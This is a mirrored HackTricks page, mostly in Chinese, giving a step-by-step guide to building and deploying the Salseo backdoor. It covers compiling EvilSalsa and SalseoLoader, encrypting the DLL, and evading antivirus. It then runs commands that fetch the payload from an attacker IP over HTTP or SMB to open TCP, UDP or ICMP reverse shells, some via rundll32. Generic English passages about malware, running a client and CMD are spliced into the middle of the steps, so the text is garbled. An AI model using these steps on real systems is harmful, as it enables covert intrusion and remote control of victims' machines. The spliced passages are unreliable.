Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/backdoors/salseo.md

13 KiB
Raw Blame History

Salseo

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

编译二进制文件

从github下载源代码并编译EvilSalsaSalseoLoader。你需要安装Visual Studio来编译代码。

将这些项目编译为你将要使用它们的Windows系统的架构如果Windows支持x64则编译为该架构

你可以在Visual Studio中的左侧"Build"选项卡中选择架构,在**"Platform Target"**中。

(**如果你找不到这些选项,请点击**"Project Tab",然后点击"<Project Name> Properties"**)

然后构建这两个项目Build -> Build Solution在日志中将显示可执行文件的路径

准备后门

首先,你需要对EvilSalsa.dll进行编码。你可以使用python脚本encrypterassembly.py或者编译项目EncrypterAssembly

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

Salseo Backdoor

The Salseo backdoor is a type of malware that provides unauthorized access to a compromised Windows system. It is designed to remain hidden and undetected, allowing an attacker to maintain persistent control over the infected machine.

Functionality

Once installed on a target system, the Salseo backdoor establishes a covert communication channel with a remote command and control (C2) server. This allows the attacker to remotely execute commands on the compromised system and retrieve sensitive information.

The backdoor is capable of performing various malicious activities, including:

  1. Remote Access: The attacker can gain full control over the infected system, enabling them to perform actions as if they were physically present.

  2. Data Exfiltration: The backdoor can steal sensitive data from the compromised system, such as login credentials, financial information, or intellectual property.

  3. Keylogging: Salseo can capture keystrokes, allowing the attacker to monitor and record user activities, including passwords and other confidential information.

  4. File Manipulation: The backdoor can create, modify, or delete files on the compromised system, giving the attacker the ability to plant additional malware or tamper with existing files.

  5. System Surveillance: Salseo can gather system information, such as installed software, hardware details, and network configurations, providing the attacker with valuable insights for further exploitation.

Infection Vectors

The Salseo backdoor can be delivered through various infection vectors, including:

  1. Phishing Emails: Malicious attachments or links in phishing emails can lead to the installation of the backdoor when clicked or opened.

  2. Drive-by Downloads: Visiting compromised or malicious websites can trigger the automatic download and execution of the backdoor without the user's knowledge.

  3. Exploit Kits: Salseo can be delivered through exploit kits that target vulnerabilities in outdated software or plugins, allowing the attacker to gain unauthorized access.

  4. Malicious Downloads: Downloading and executing files from untrusted sources can result in the installation of the backdoor.

Detection and Prevention

To detect and prevent the Salseo backdoor, consider the following measures:

  1. Antivirus Software: Keep your antivirus software up to date and perform regular scans to detect and remove any malware, including the Salseo backdoor.

  2. Patch Management: Ensure that all software and plugins are updated with the latest security patches to mitigate vulnerabilities that could be exploited by the backdoor.

  3. Email Security: Implement email security measures, such as spam filters and email authentication protocols, to prevent phishing emails from reaching users' inboxes.

  4. User Education: Train users to recognize and avoid suspicious emails, links, and downloads to minimize the risk of inadvertently installing the backdoor.

  5. Network Monitoring: Monitor network traffic for any suspicious communication patterns or connections to known malicious C2 servers associated with the Salseo backdoor.

By implementing these security measures, you can enhance the protection of your Windows systems against the Salseo backdoor and other similar threats.

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

好的现在你已经拥有执行所有Salseo操作所需的一切编码的EvilDalsa.dllSalseoLoader的二进制文件

将SalseoLoader.exe二进制文件上传到目标机器。它们不应该被任何杀毒软件检测到...

执行后门

获取TCP反向Shell通过HTTP下载编码的dll

记得启动一个nc作为反向Shell监听器并启动一个HTTP服务器来提供编码的evilsalsa。

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

获取UDP反向shell通过SMB下载编码的dll

记得启动一个nc作为反向shell监听器并启动一个SMB服务器来提供编码的evilsalsaimpacket-smbserver

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

获取ICMP反向shell已在受害者内部编码的dll

这次你需要在客户端上使用一个特殊工具来接收反向shell。下载 https://github.com/inquisb/icmpsh

禁用ICMP回复

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

执行客户端:

To execute the client, you need to follow these steps:

  1. Make sure you have the client file downloaded and saved on your local machine.

  2. Open a terminal or command prompt.

  3. Navigate to the directory where the client file is located using the cd command.

  4. Once you are in the correct directory, run the client file by typing its name followed by the appropriate command. For example, if the client file is named client.exe, you would type client.exe and press Enter.

  5. The client will then execute and start running on your machine.

Remember to exercise caution when executing any files, especially those obtained from untrusted sources. Always scan files for malware before running them.

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

在受害者内部让我们执行salseo操作

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

将SalseoLoader编译为导出主函数的DLL

使用Visual Studio打开SalseoLoader项目。

在主函数之前添加:[DllExport]

为该项目安装DllExport

工具 --> NuGet程序包管理器 --> 管理解决方案的NuGet程序包...

搜索DllExport包使用浏览选项卡然后点击安装并接受弹出窗口

在项目文件夹中会出现以下文件:DllExport.batDllExport_Configure.bat

卸载DllExport

点击卸载(是的,很奇怪,但相信我,这是必要的)

退出Visual Studio并执行DllExport_configure

只需退出Visual Studio

然后,转到SalseoLoader文件夹执行DllExport_Configure.bat

选择x64如果您将在x64系统中使用它这是我的情况选择System.Runtime.InteropServices(在DllExport的命名空间中)并点击应用

再次使用Visual Studio打开项目

**[DllExport]**不再被标记为错误

构建解决方案

选择输出类型=类库(项目 --> SalseoLoader属性 --> 应用程序 --> 输出类型=类库)

选择x64平台(项目 --> SalseoLoader属性 --> 构建 --> 平台目标=x64

构建解决方案:构建 --> 构建解决方案在输出控制台中将显示新DLL的路径

测试生成的DLL

将DLL复制并粘贴到要进行测试的位置。

执行:

rundll32.exe SalseoLoader.dll,main

如果没有出现错误那么你可能有一个功能正常的DLL

使用DLL获取一个shell

不要忘记使用一个HTTP 服务器并设置一个nc 监听器

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a text-based interface for executing commands and managing the system. CMD can be used to perform various tasks, such as navigating through directories, running programs, and managing files and processes.

CMD is a powerful tool for hackers as it allows them to execute commands and scripts on a target system. By gaining access to CMD, hackers can exploit vulnerabilities, escalate privileges, and gain control over the target system.

To access CMD, you can open the Start menu, type "cmd" in the search bar, and press Enter. This will open the Command Prompt window, where you can start executing commands.

It is important to note that CMD should only be used for legitimate purposes, such as system administration or troubleshooting. Using CMD for malicious activities is illegal and unethical.

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥